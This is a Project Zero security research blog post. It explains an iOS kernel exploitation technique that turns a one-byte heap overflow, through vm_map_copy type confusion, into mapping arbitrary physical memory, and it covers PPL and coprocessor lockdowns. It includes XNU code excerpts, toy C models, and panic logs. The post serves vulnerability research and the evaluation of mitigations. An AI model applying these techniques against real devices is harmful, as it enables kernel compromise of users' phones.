  8. Using the stale TLB entry, write to page Q to insert an L3 TTE which maps Q itself as writable.

This bypass was reported as Project Zero issue 2035 and fixed in iOS 13.6; you can find a POC that demonstrates how to map arbitrary physical addresses into EL0 there. Also, for a much more detailed look at exploiting improper TLB invalidation, check out Jann Horn's excellent blog post on the topic.
This bug demonstrates a common problem when creating a security boundary where none existed before. It's easy for code to make subtle assumptions about the security model (such as where argument validation occurs or what functionality is exposed vs. private) that no longer hold true under the new model. I wouldn't be surprised to see more bugs along this line in PPL.
Overall, though, I came away from this exercise impressed with the design of PPL. I think it's a sound mitigation with a clear security boundary that doesn't introduce more attack surface. My biggest criticism is that the value-add proposition of PPL is still not yet clear to me: What real-world attacks does PPL mitigate? Is it simply laying the groundwork for more sophisticated and powerful mitigations to come? Whatever the answer may be, I still prefer having it. Kudos to Apple for an interesting and well-thought-out mitigation.
Category: Hacking & Security

One Byte to rule them all

30 July, 2020 - 18:17
Posted by Brandon Azad, Project Zero
One Byte to rule them all, One Byte to type them,
One Byte to map them all, and in userspace bind them
-- Comment above vm_map_copy_t
For the last several years, nearly all iOS kernel exploits have followed the same high-level flow: memory corruption and fake Mach ports are used to gain access to the kernel task port, which provides an ideal kernel read/write primitive to userspace. Recent iOS kernel exploit mitigations like PAC and zone_require seem geared towards breaking the canonical techniques seen over and over again to achieve this exploit flow. But the fact that so many iOS kernel exploits look identical from a high level begs questions: Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?
In this blog post, I'll describe a new iOS kernel exploitation technique that turns a one-byte controlled heap overflow directly into a read/write primitive for arbitrary physical addresses, all while completely sidestepping current mitigations such as KASLR, PAC, and zone_require. By reading a special hardware register, it's possible to locate the kernel in physical memory and build a kernel read/write primitive without a fake kernel task port. I'll conclude by discussing how effective various iOS mitigations were or could be at blocking this technique and by musing on the state-of-the-art of iOS kernel exploitation. You can find the proof-of-concept code here.

I - The Fellowship of the Wiring

A struct of power

While looking through the XNU sources, I often keep an eye out for interesting objects to manipulate or corrupt for future exploits. Soon after discovering CVE-2020-3837 (the oob_timestamp vulnerability), I stumbled across the definition of vm_map_copy_t:
struct vm_map_copy {
        int                     type;
#define VM_MAP_COPY_ENTRY_LIST          1
#define VM_MAP_COPY_OBJECT              2
#define VM_MAP_COPY_KERNEL_BUFFER       3
        vm_object_offset_t      offset;
        vm_map_size_t           size;
        union {
                struct vm_map_header    hdr;      /* ENTRY_LIST */
                vm_object_t             object;   /* OBJECT */
                uint8_t                 kdata[0]; /* KERNEL_BUFFER */
        } c_u;
};
This looked interesting to me for several reasons:
  1. The structure has a type field at the very start, so an out-of-bounds write could change it from one type to another, leading to type confusion. Because iOS is little-endian, the least significant byte comes first in memory, meaning that even a single-byte overflow would be sufficient to set the type to any of the three values.
  2. The type discriminates a union between arbitrary controlled data (kdata) and kernel pointers (hdr and object). Thus, corrupting the type could let us directly fake pointers to kernel objects without needing to perform any reallocations.
  3. I remembered reading about vm_map_copy_t being used as an interesting primitive in past exploits (before iOS 10), though I couldn't remember where or how it was used. vm_map_copy objects were also used by Ian Beer in Splitting atoms in XNU.
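The first point in the list above can be illustrated with a toy model. This is only a sketch: the 16-byte victim buffer, the `toy_heap` layout, and the off-by-one bound in `buggy_write` are hypothetical stand-ins for a real vulnerability, and the heap is modelled as a plain byte array with explicit little-endian encoding so that the example does not depend on the host's byte order.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define VM_MAP_COPY_ENTRY_LIST    1
#define VM_MAP_COPY_KERNEL_BUFFER 3

#define VICTIM_BUF_SIZE 16u  /* hypothetical size of the overflowed buffer */

/* Toy heap: an overflowable buffer directly followed by the four bytes
 * of the type field of a neighbouring vm_map_copy. */
struct toy_heap {
    uint8_t bytes[VICTIM_BUF_SIZE + 4];
};

/* Store and load a 32-bit value in little-endian order, as on iOS. */
static void store_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

static uint32_t load_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* The neighbouring object starts out as a KERNEL_BUFFER copy. */
static void toy_heap_init(struct toy_heap *h)
{
    memset(h->bytes, 0, sizeof(h->bytes));
    store_le32(h->bytes + VICTIM_BUF_SIZE, VM_MAP_COPY_KERNEL_BUFFER);
}

/* Hypothetical buggy copy: the bound is off by one, so a caller can
 * write a single byte past the end of the victim buffer. */
static void buggy_write(struct toy_heap *h, const uint8_t *src, size_t len)
{
    assert(len <= VICTIM_BUF_SIZE + 1); /* should be <= VICTIM_BUF_SIZE */
    memcpy(h->bytes, src, len);
}

/* The type field as the kernel would read it from the neighbour. */
static uint32_t neighbour_type(const struct toy_heap *h)
{
    return load_le32(h->bytes + VICTIM_BUF_SIZE);
}
```

Writing 17 bytes whose last byte is 1 through `buggy_write()` changes `neighbour_type()` from 3 (KERNEL_BUFFER) to 1 (ENTRY_LIST), because the overflowing byte lands on the least significant byte of the type field and the upper three bytes are already zero.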

So, vm_map_copy looks like a possibly interesting target for corruption; however, it's only truly interesting if the code uses it in a truly interesting way.
Digging through osfmk/vm/vm_map.c, I found that vm_map_copyout_internal() does indeed use the copy object in a very interesting way. But first, let's talk a little more about what vm_map_copy is and how it works.
A vm_map_copy represents a copy-on-write slice of a process's virtual address space which has been packaged up, ready to be inserted into another virtual address space. There are three possible internal representations: as a list of vm_map_entry objects, as a vm_object, or as an inline array of bytes to be directly copied into the destination. We'll focus on types 1 and 3.
Fundamentally, the ENTRY_LIST type is the most powerful and general representation, while the KERNEL_BUFFER type is strictly an optimization. A vm_map_entry list consists of several allocations and several layers of indirection: each vm_map_entry describes a virtual address range [vme_start, vme_end) that is being mapped by a specific vm_object, which in turn contains a list of vm_pages describing the physical pages backing the vm_object.

Meanwhile, if the data being inserted is not shared memory and if the size is roughly two pages or less, then the vm_map_copy is simply over-allocated to hold the data contents inline in the same allocation, no indirection or further allocations required.

As a consequence of this optimization, the 8 bytes of the vm_map_copy object at offset 0x20 can be either a pointer to the head of a vm_map_entry list, or fully attacker-controlled data, all depending on the type field at the start. So corrupting the first byte of a vm_map_copy object causes the kernel to interpret arbitrary controlled data as a vm_map_entry pointer.
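The reinterpretation described above can be sketched with a simplified struct. The `toy_` types below are assumptions for illustration: pointers are modelled as `uint64_t`, the header is reduced to its four link fields, and `kdata` is given a fixed size. On a typical 64-bit ABI this puts the union at offset 0x18 and the list-head pointer at offset 0x20.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { COPY_ENTRY_LIST = 1, COPY_OBJECT = 2, COPY_KERNEL_BUFFER = 3 };

/* Simplified stand-in for the links at the start of the header. */
struct toy_links {
    uint64_t prev;
    uint64_t next;   /* head of the entry list */
    uint64_t start;
    uint64_t end;
};

/* Simplified stand-in for struct vm_map_copy. */
struct toy_vm_map_copy {
    int32_t  type;
    uint64_t offset;
    uint64_t size;
    union {
        struct toy_links hdr;       /* ENTRY_LIST */
        uint64_t         object;    /* OBJECT */
        uint8_t          kdata[32]; /* KERNEL_BUFFER (fixed size here) */
    } c_u;
};

/* Build a KERNEL_BUFFER copy holding inline data chosen by the sender. */
static void toy_fill_kernel_buffer(struct toy_vm_map_copy *copy,
                                   const uint8_t *data, size_t len)
{
    assert(len <= sizeof(copy->c_u.kdata));
    memset(copy, 0, sizeof(*copy));
    copy->type = COPY_KERNEL_BUFFER;
    copy->size = len;
    memcpy(copy->c_u.kdata, data, len);
}

/* What code handling an ENTRY_LIST copy treats as the first entry pointer. */
static uint64_t toy_first_entry(const struct toy_vm_map_copy *copy)
{
    assert(copy->type == COPY_ENTRY_LIST);
    return copy->c_u.hdr.next;
}
```

If the inline data is sixteen 0x41 bytes and the type is then flipped to `COPY_ENTRY_LIST` (standing in for the one-byte corruption), `toy_first_entry()` returns 0x4141414141414141: the second eight bytes of the sender's data are now read as the list-head pointer.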

With this understanding of vm_map_copy internals, let's turn back to vm_map_copyout_internal(). This function is responsible for taking a vm_map_copy and inserting it into the destination address space (represented by type vm_map_t). It is reachable when sharing memory between processes by sending an out-of-line memory descriptor in a Mach message: the out-of-line memory is stored in the kernel as a vm_map_copy, and vm_map_copyout_internal() is the function that inserts it into the receiver's process.
As it turns out, things get rather exciting if vm_map_copyout_internal() processes a corrupted vm_map_copy containing a pointer to a fake vm_map_entry hierarchy. In particular, consider what happens if the fake vm_map_entry claims to be wired, which causes the function to try to fault in the page immediately:
kern_return_t
vm_map_copyout_internal(
    vm_map_t                dst_map,
    vm_map_address_t        *dst_addr,      /* OUT */
    vm_map_copy_t           copy,
    vm_map_size_t           copy_size,
    boolean_t               consume_on_success,
    vm_prot_t               cur_protection,
    vm_prot_t               max_protection,
    vm_inherit_t            inheritance)
{
...
    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }
...
    vm_map_lock(dst_map);
...
    adjustment = start - vm_copy_start;
...
    /*
     *    Adjust the addresses in the copy chain, and
     *    reset the region attributes.
     */
    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {
...
        entry->vme_start += adjustment;
        entry->vme_end += adjustment;
...
        /*
         * If the entry is now wired,
         * map the pages into the destination map.
         */
        if (entry->wired_count != 0) {
...
            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {
...
                m = vm_page_lookup(object, offset);
...
                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);
...
                offset += PAGE_SIZE_64;
                va += PAGE_SIZE;
            }
        }
    }
...
    vm_map_copy_insert(dst_map, last, copy);
...
    vm_map_unlock(dst_map);
...
}
Let's walk through this step-by-step. First, other vm_map_copy types are handled:
    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }
The vm_map is locked:
    vm_map_lock(dst_map);
We enter a for loop over the linked list of (fake) vm_map_entry objects:
    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {
We handle the case where the vm_map_entry is wired and should thus be faulted in immediately:
        if (entry->wired_count != 0) {
If it is wired, we loop over every virtual address in the wired entry. Since we control the contents of the fake vm_map_entry, we can control the object pointer (of type vm_object) and offset value that are read:
            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {
We look up the vm_page struct for each physical page of memory that needs to be wired in. Since we control the fake vm_object and the offset, we can cause vm_page_lookup() to return a pointer to a fake vm_page struct whose contents we control:
                m = vm_page_lookup(object, offset);
And finally, we call vm_fault_enter() to fault in the page:
                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);
The call to vm_fault_enter() is rather complicated, so I won't put the code here. Suffice to say, by setting fields in our fake objects appropriately, it is possible to navigate vm_fault_enter() with a fake vm_page object in order to reach a call to pmap_enter_options() with a completely arbitrary physical page number:
kern_return_t
pmap_enter_options(
        pmap_t pmap,
        vm_map_address_t v,
        ppnum_t pn,
        vm_prot_t prot,
        vm_prot_t fault_type,
        unsigned int flags,
        boolean_t wired,
        unsigned int options,
        __unused void   *arg)
pmap_enter_options() is responsible for modifying the page tables of the destination to insert the translation table entry that will establish a mapping from a virtual address to a physical address. Analogously to how vm_map manages the state for the virtual mappings of an address space, the pmap struct manages the state for the physical mappings (i.e. page tables) of an address space. And according to the sources in osfmk/arm/pmap.c, no further validation is performed on the supplied physical page number before the translation table entry is added.
Thus, our corrupted vm_map_copy object actually gives us an incredibly powerful primitive: mapping arbitrary physical memory directly into our process in userspace!

An old friend

I decided to build the POC for the vm_map_copy physical memory mapping technique on top of the kernel read/write primitive provided by the oob_timestamp exploit for iOS 13.3. There were two primary reasons for this.
First, I did not have a good bug available to develop a complete exploit with it. Even though I had initially stumbled upon the idea while trying to exploit the oob_timestamp bug, it quickly became apparent that that bug wasn't a good fit for this technique.
Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately.
This technique most naturally fits a controlled one-byte linear heap overflow in any of the allocator zones kalloc.80 through kalloc.32768 (i.e., general-purpose allocations of between 65 and 32768 bytes). For ease of reference in the rest of this post, I'll simply call it the one-byte exploit technique.

Leaving the Shire

We've already laid out the bones of the technique above: create a vm_map_copy of type KERNEL_BUFFER containing a pointer to a fake vm_map_entry list, corrupt the type to ENTRY_LIST, receive it with vm_map_copyout_internal(), and get arbitrary physical memory mapped into our address space. However, successful exploitation is a little bit more complicated:
  1. We still have not addressed where this fake vm_map_entry/vm_object/vm_page hierarchy will be constructed.
  2. We need to ensure that the kernel thread that calls vm_map_copyout_internal() does not crash, panic, or deadlock after mapping the physical page.
  3. Mapping one physical page is great, but probably not sufficient by itself to achieve arbitrary kernel read/write. This is because:

    1. The kernelcache's exact load address in physical memory is unknown, so we cannot map any specific page of it directly without locating it first.
    2. It is possible that some hardware device exposes an MMIO interface that is powerful enough by itself to build some sort of read/write primitive; however, I'm not aware of any such component.

    Thus, we will need to map more than one physical address, and most likely we will need to use data read from one mapping to find the physical address to use for another. This means our mapping primitive can not be one-shot.
  4. The call to vm_map_copy_insert() after the for loop tries to zfree() the vm_map_copy to the vm_map_copy_zone. This will panic given a vm_map_copy originally of type KERNEL_BUFFER, since KERNEL_BUFFER objects are initially allocated using kalloc().

    Thus, the only way to safely break out of the for loop and resume normal operation is to first get kernel read/write and then patch up state in the kernel to prevent this panic.

These constraints will guide the course of this exploit technique.

A short cut to PAN

An important prerequisite for the one-byte technique is to create a fake vm_map_entry object hierarchy at a known address. Since we are already building this POC on oob_timestamp, I decided to leverage a neat trick I picked up while exploiting that bug. In the real world, another vulnerability in addition to the one-byte overflow might be needed to leak a kernel address.
While developing the POC for oob_timestamp, I learned that the AGXAccelerator kernel extension provides a very interesting primitive: IOAccelSharedUserClient2 and IOAccelCommandQueue2 together allow the creation of large regions of pageable memory shared between userspace and the kernel. Having access to user/kernel shared memory can be extremely helpful when developing exploits, since you can place fake kernel data structures there and manipulate them while the kernel accesses them. Of course, this AGXAccelerator primitive is not the only way to get kernel/user shared memory; the physmap, for example, also maps most of DRAM into virtual memory, so it can also be used to reflect userspace memory contents into the kernel. However, the AGXAccelerator primitive is often much more convenient in practice: for one, it provides a very large contiguous shared memory region in a much more constrained address range; and for two, it's easier to leak addresses of adjacent objects to locate it.
Now, before the iPhone 7, iOS devices did not support the Privileged Access Never (PAN) security feature. This meant that all of userspace was effectively shared memory with the kernel, and you could just overwrite pointers in the kernel to point to fake data structures in userspace.
However, modern iOS devices enable PAN, so attempts by the kernel to directly access userspace memory will fault. This is what makes the existence of the AGXAccelerator shared memory primitive so useful: if you can establish a large shared memory region and learn its address in the kernel, that's basically equivalent to having PAN turned off.
Of course, a key part of that sentence is "and learn its address in the kernel"; doing that usually requires a vulnerability and some effort. Instead, as we already rely on oob_timestamp, we will simply hardcode the shared memory address and note that finding the address dynamically is left as an exercise for the reader.

At the sign of the panicking POC

With kernel read/write and a user/kernel shared memory buffer in hand, we are ready to write the POC. The overall flow of the exploit is essentially what was outlined above.
We start by creating the shared memory region in the kernel.
We initialize a fake vm_map_entry list inside the shared memory. The entry list contains 3 entries: a "ready" entry, a "mapping" entry, and a "done" entry. Together these entries will represent the current state of each mapping operation.

We send an out-of-line memory descriptor containing a fake vm_map_header in a Mach message to a holding port. The out-of-line memory is stored in the kernel as a vm_map_copy object of type KERNEL_BUFFER (value 3).

We simulate a one-byte linear heap overflow that corrupts the type field of the vm_map_copy, changing it to ENTRY_LIST (value 1).

We start a thread that receives the Mach message queued on the holding port. This triggers a call to vm_map_copyout_internal() on the corrupted vm_map_copy.
Due to the way the vm_map_entry list was initially configured, the vm_map_copyout thread will spin in an infinite loop on the "done" entry, ready for us to manipulate it.

At this point, we have a kernel thread that is spinning ready to map any physical page we request.
To map a page, we first set the "ready" entry to link to itself, and then set the "done" entry to link to the "ready" entry. This will cause the vm_map_copyout thread to spin on "ready".

While spinning on "ready", we mark the "mapping" entry as wired with a single physical page and link it to the "done" entry, which we link to itself. We also populate the fake vm_object and vm_page to map the desired physical page number.

Then, we can perform the mapping by linking the "ready" entry to the "mapping" entry. vm_map_copyout_internal() will map in the page and then spin on the "done" entry, signaling completion.
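The three-entry handshake described above can be modelled in a few lines. This is a single-threaded sketch under simplifying assumptions: `toy_kernel_step()` stands in for one iteration of the for loop in vm_map_copyout_internal(), "mapping a page" is reduced to recording a page number, and all `toy_` names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_MAPPED 8u

/* Stand-in for a fake vm_map_entry in shared memory. */
struct toy_entry {
    struct toy_entry *next;
    int wired;        /* stands in for wired_count != 0 */
    uint64_t ppnum;   /* stands in for the fake vm_page's page number */
};

struct toy_copyout {
    struct toy_entry ready, mapping, done;
    struct toy_entry *cur;          /* entry the kernel loop is currently on */
    uint64_t mapped[MAX_MAPPED];    /* page numbers "mapped" so far */
    size_t n_mapped;
};

/* Initial state: the kernel thread spins on "done". */
static void toy_init(struct toy_copyout *c)
{
    c->ready   = (struct toy_entry){ &c->ready, 0, 0 };
    c->mapping = (struct toy_entry){ &c->done, 0, 0 };
    c->done    = (struct toy_entry){ &c->done, 0, 0 };
    c->cur = &c->done;
    c->n_mapped = 0;
}

/* One iteration of the kernel loop: map if wired, then follow the link. */
static void toy_kernel_step(struct toy_copyout *c)
{
    if (c->cur->wired) {
        assert(c->n_mapped < MAX_MAPPED);
        c->mapped[c->n_mapped++] = c->cur->ppnum;
    }
    c->cur = c->cur->next;
}

/* Userspace, step 1: park the kernel thread on "ready". */
static void toy_park_on_ready(struct toy_copyout *c)
{
    c->ready.next = &c->ready;
    c->done.next = &c->ready;
}

/* Userspace, step 2 (while the kernel spins on "ready"): stage the mapping. */
static void toy_stage_mapping(struct toy_copyout *c, uint64_t ppnum)
{
    c->mapping.wired = 1;
    c->mapping.ppnum = ppnum;
    c->mapping.next = &c->done;
    c->done.next = &c->done;
}

/* Userspace, step 3: release the kernel thread into "mapping". */
static void toy_fire(struct toy_copyout *c)
{
    c->ready.next = &c->mapping;
}
```

Because "mapping" is visited exactly once on the way from "ready" to "done", each park/stage/fire cycle maps exactly one page and leaves the loop spinning on "done" again, which is what makes the primitive reusable.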

This gives us a reusable primitive that maps arbitrary physical addresses into our process. As an initial proof of concept, I mapped the non-existent physical address 0x414140000 and tried to read from it, triggering an LLC bus error from EL0:

The mines of memory

At this point we have proved that the mapping primitive is sound, but we still don't know what to do with it.
My first thought was that the easiest approach would be to go after the kernelcache image in memory. Note that on modern iPhones, even with a direct physical read/write primitive, KTRR prevents us from modifying the locked down portions of the kernel image, so we can't just patch the kernel's executable code. However, certain segments of the kernelcache image remain writable at runtime, including the part of the __DATA segment that contains sysctls. Since sysctls have been (ab)used before to build read/write primitives, this felt like a stable path forward.
The challenge was then to use the mapping primitive to locate the kernelcache in physical memory, so that the sysctl structs could then be mapped into userspace and modified.
But first, before we figure out how to locate the kernelcache, some background on physical memory on the iPhone 11 Pro.
The iPhone 11 Pro has 4 GB of DRAM based at physical address 0x800000000, so physical DRAM addresses span 0x800000000 to 0x900000000. Of this, the range 0x801b80000 to 0x8ec9b4000 is reserved for the Application Processor (AP), the main processor of the phone which runs the XNU kernel and applications. Memory outside this region is reserved for coprocessors like the Always On Processor (AOP), Apple Neural Engine (ANE), SIO (possibly Apple SmartIO), AVE, ISP, IOP, etc. The addresses of these and other regions can be found by parsing the devicetree or by dumping the iboot-handoff region at the start of DRAM.
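As a small sketch of this layout, the following classifies a physical address using only the ranges quoted above. Treating each range as half-open (start inclusive, end exclusive) is an assumption, and `classify_phys` and the enum names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Ranges quoted in the text for the iPhone 11 Pro. */
#define DRAM_BASE 0x800000000ULL
#define DRAM_END  0x900000000ULL  /* DRAM_BASE + 4 GB */
#define AP_BASE   0x801b80000ULL
#define AP_END    0x8ec9b4000ULL

enum phys_region {
    PHYS_NOT_DRAM,    /* e.g. MMIO or an unbacked address */
    PHYS_AP_DRAM,     /* reserved for the Application Processor */
    PHYS_OTHER_DRAM   /* DRAM outside the AP range (coprocessors etc.) */
};

static enum phys_region classify_phys(uint64_t pa)
{
    /* Sanity check on the constants: the AP range lies inside DRAM. */
    assert(AP_BASE >= DRAM_BASE && AP_END <= DRAM_END);

    if (pa < DRAM_BASE || pa >= DRAM_END)
        return PHYS_NOT_DRAM;
    if (pa >= AP_BASE && pa < AP_END)
        return PHYS_AP_DRAM;
    return PHYS_OTHER_DRAM;
}
```

With these constants, the very start of DRAM at 0x800000000 falls outside the AP range, as does everything from 0x8ec9b4000 up to the end of DRAM.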

At boot time, the kernelcache is loaded contiguously into physical memory, which means that finding a single kernelcache page is sufficient to locate the whole image. Also, while KASLR may slide the kernelcache by a large amount in virtual memory, the load address in physical memory is quite constrained: in my testing, the kernel header was always loaded at an address between 0x805000000 and 0x807000000, a range of just 32 MB.
As it turns out, this range is smaller than the kernelcache itself at 0x23d4000 bytes, or 35.8 MB. Thus, we can be certain at runtime that address 0x807000000 contains a kernelcache page.
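The reasoning here is a simple interval argument: if the image is larger than the window of possible load addresses, then the top of that window is inside the image wherever it was loaded. A minimal sketch, with hypothetical helper names:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* True if the address max_base lies inside the image for every possible
 * load address in [min_base, max_base], for an image of image_size bytes.
 * The worst case is a load at min_base, which covers max_base only if
 * min_base + image_size > max_base. */
static bool max_base_always_in_image(uint64_t min_base, uint64_t max_base,
                                     uint64_t image_size)
{
    assert(min_base <= max_base);
    return image_size > max_base - min_base;
}

/* Whole mebibytes in a byte count, rounded down. */
static uint64_t bytes_to_whole_mib(uint64_t bytes)
{
    return bytes >> 20;
}
```

With the numbers from the text, the window 0x805000000 to 0x807000000 is 32 MB wide and the 0x23d4000-byte kernelcache is a little over 35 MB, so `max_base_always_in_image()` returns true for address 0x807000000.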
However, I quickly ran into panics when trying to map the kernelcache:
panic(cpu 4 caller 0xfffffff0156f0c98): "pmap_enter_options_internal: page belongs to PPL, " "pmap=0xfffffff031a581d0, v=0x3bb844000, pn=2103160, prot=0x3, fault_type=0x3, flags=0x0, wired=1, options=0x1"
This panic string purports to come from the function pmap_enter_options_internal(), which is in the open-source part of XNU (osfmk/arm/pmap.c), and yet the panic is not present in the sources. Thus, I reversed the version of pmap_enter_options_internal() in the kernelcache to figure out what was happening.
The issue, I learned, is that the specific page I was trying to map was part of Apple's Page Protection Layer (PPL), a portion of the XNU kernel that manages page tables and that is considered even more privileged than the rest of the kernel. The goal of PPL is to prevent an attacker from modifying protected pages (in particular, executable code pages for codesigned binaries) even after compromising the kernel to obtain a read/write capability.
In order to enforce that protected pages cannot be modified, PPL must protect page tables and page table metadata. Thus, when I tried to map a PPL-protected page into userspace, it triggered a panic.
if (pa_test_bits(pa, 0x4000 /* PP_ATTR_PPL? */)) {
    panic("%s: page belongs to PPL, " ...);
}
if (pvh_get_flags(pai_to_pvh(pai)) & PVH_FLAG_LOCKDOWN) {
    panic("%s: page locked down, " ...);
}
The presence of PPL significantly complicates use of the physical mapping primitive, since trying to map a PPL-protected page will panic. And the kernelcache itself contains many PPL-protected pages, splitting the contiguous 35 MB binary into smaller PPL-free chunks that no longer bridge the physical slide of the kernelcache. Thus, there is no longer a single physical address we can (safely) map that is guaranteed to be a kernelcache page.
And the rest of the AP's DRAM region is an equally treacherous minefield. Physical pages are grabbed for use by PPL and returned to the kernel as-needed, and so at runtime PPL pages are scattered throughout physical memory like mines. Thus, there is no static address anywhere that is guaranteed not to blow up.
A map showing the protection flags on every page of AP DRAM on the A13 over time. Yellow is PPL+LOCKDOWN, red is PPL, green is LOCKDOWN, and blue is unguarded (i.e., mappable).

II - The Two Techniques

The road to DRAM's guard

Yet, that's not quite true. The Application Processor's DRAM region might be a minefield, but anything outside of it is not. That includes the DRAM used by coprocessors and also any other addressable components of the system, such as hardware registers for system components that are typically accessed via memory-mapped I/O (MMIO).
With such a powerful primitive, I expect that there are a plethora of techniques that could be used to build a read/write primitive. And I expect that there are many clever things that could be done by leveraging direct access to special hardware registers and coprocessors. Unfortunately, this is not an area with which I'm very familiar, so I'll just describe one (failed) attempt to bypass PPL here.
The idea I had was to take control of some coprocessor and use execution on both the coprocessor and the AP together to attack the kernel. First, we use the physical mapping primitive to modify the part of DRAM storing data for a coprocessor in order to get code execution on that coprocessor. Next, back on the main processor, we use the mapping primitive a second time to map and disable the coprocessor's Device Address Resolution Table, or DART (basically an IOMMU). With code execution on the coprocessor and the corresponding DART disabled, we have direct unguarded access from the coprocessor to physical memory, allowing us to completely sidestep the protections of PPL (which are only enforced from the AP).
However, whenever I tried to modify certain regions of DRAM used by coprocessors, I would get kernel panics. In particular, the region 0x800000000 - 0x801564000 appeared to be readonly:
panic(cpu 5 caller 0xfffffff0189fc598): "LLC Bus error from cpu1: FAR=0x16f507f10 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214000800000000/0x1 addr=0x800000000 cmd=0x14(acc_cifl2c_cmd_ncwr)"
panic(cpu 5 caller 0xfffffff020ca4598): "LLC Bus error from cpu1: FAR=0x15f03c000 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214030800104000/0x1 addr=0x800104000 cmd=0x14(acc_cifl2c_cmd_ncwr)"
panic(cpu 5 caller 0xfffffff02997c598): "LLC Bus error from cpu1: FAR=0x10a024000 LLC_ERR_STS/ADR/INF=0x11000ffc00000082/0x21400080154c000/0x1 addr=0x80154c000 cmd=0x14(acc_cifl2c_cmd_ncwr)"
This was very weird: these addresses are outside of the KTRR lockdown region, so nothing should be able to block writing to this part of DRAM with a physical mapping primitive! Thus, there must be some other undocumented lockdown enforced on this physical range.
On the other hand, the region 0x801564000 - 0x801b80000 remains writable as expected, and writing to different areas in this region produces odd system behaviors, supporting the theory that this is corrupting data used by coprocessors. For example, writing to some areas would cause the camera and flashlight to become unresponsive, while writing to other areas would cause the phone to panic when the mute slider was switched on.
To get a better sense of what might be happening, I identified the regions in this range by examining the devicetree and dumping memory. In the end, I discovered the following layout of coprocessor firmware segments in the range 0x800000000 - 0x801b80000:

Thus, the regions that are locked down are all __TEXT segments of coprocessor firmwares; this strongly suggests that Apple has added a new mitigation to make coprocessor __TEXT segments read-only in physical memory, similar to KTRR on the AMCC (probably Apple's memory controller) but for coprocessor firmwares instead of just the AP kernel. This might be the undocumented CTRR mitigation referenced in the originally published xnu-6153.41.3 sources that appears to be an enhanced replacement for KTRR on A12 and up; Ian Beer suggested CTRR might stand for Coprocessor Text Readonly Region.
Nevertheless, code execution on these coprocessors should still be viable: just as KTRR does not prevent exploitation on the AP, the coprocessor __TEXT lockdown mitigation does not prevent exploitation on coprocessors. So, even though this mitigation makes things more difficult, at this point our plan of disabling a DART and using code execution on the coprocessor to write to a PPL-protected physical address should still work.

The voice of PPL
What did turn out to be a roadblock however was the DART/IOMMU lockdown enforced by PPL on the Application Processor. At boot, XNU parses the "pmap-io-ranges" property in the devicetree to populate the io_attr_table array, which stores page attributes for certain physical I/O addresses. Then, when trying to map the physical address, pmap_enter_options_internal() checks the attributes to see if certain mappings should be disallowed:
wimg_bits = pmap_cache_attributes(pn); // checks io_attr_table
if ( flags )
    wimg_bits = wimg_bits & 0xFFFFFF00 | (u8)flags;
pte |= wimg_to_pte(wimg_bits);
if ( wimg_bits & 0x4000 )
{
    xprr_perm = (pte >> 4) & 0xC | (pte >> 53) & 1 | (pte >> 53) & 2;
    if ( xprr_perm == 0xB )
        pte_perm_bits = 0x20000000000080LL;
    else if ( xprr_perm == 3 )
        pte_perm_bits = 0x20000000000000LL;
    else
        panic("Unsupported xPRR perm ...");
    pte = pte_perm_bits | pte & ~0x600000000000C0uLL;
}
pmap_enter_pte(pmap, pte_p, pte, vaddr);
Thus, we can only map the DART's I/O address into our process if bit 0x4000 is clear in the wimg field. Unfortunately, a quick look at the "pmap-io-ranges" property in the devicetree confirmed that bit 0x4000 was set for every DART:
    addr         len        wimg     signature
0x620000000, 0x40000000,       0x27, 'PCIe'
0x2412C0000,     0x4000,     0x4007, 'DART' ; dart-sep
0x235004000,     0x4000,     0x4007, 'DART' ; dart-sio
0x24AC00000,     0x4000,     0x4007, 'DART' ; dart-aop
0x23B300000,     0x4000,     0x4007, 'DART' ; dart-pmp
0x239024000,     0x4000,     0x4007, 'DART' ; dart-usb
0x239028000,     0x4000,     0x4007, 'DART' ; dart-usb
0x267030000,     0x4000,     0x4007, 'DART' ; dart-ave
...
0x8FC3B4000,     0x4000, 0x40004016, 'GUAT' ; sgx.gfx-handoff-base
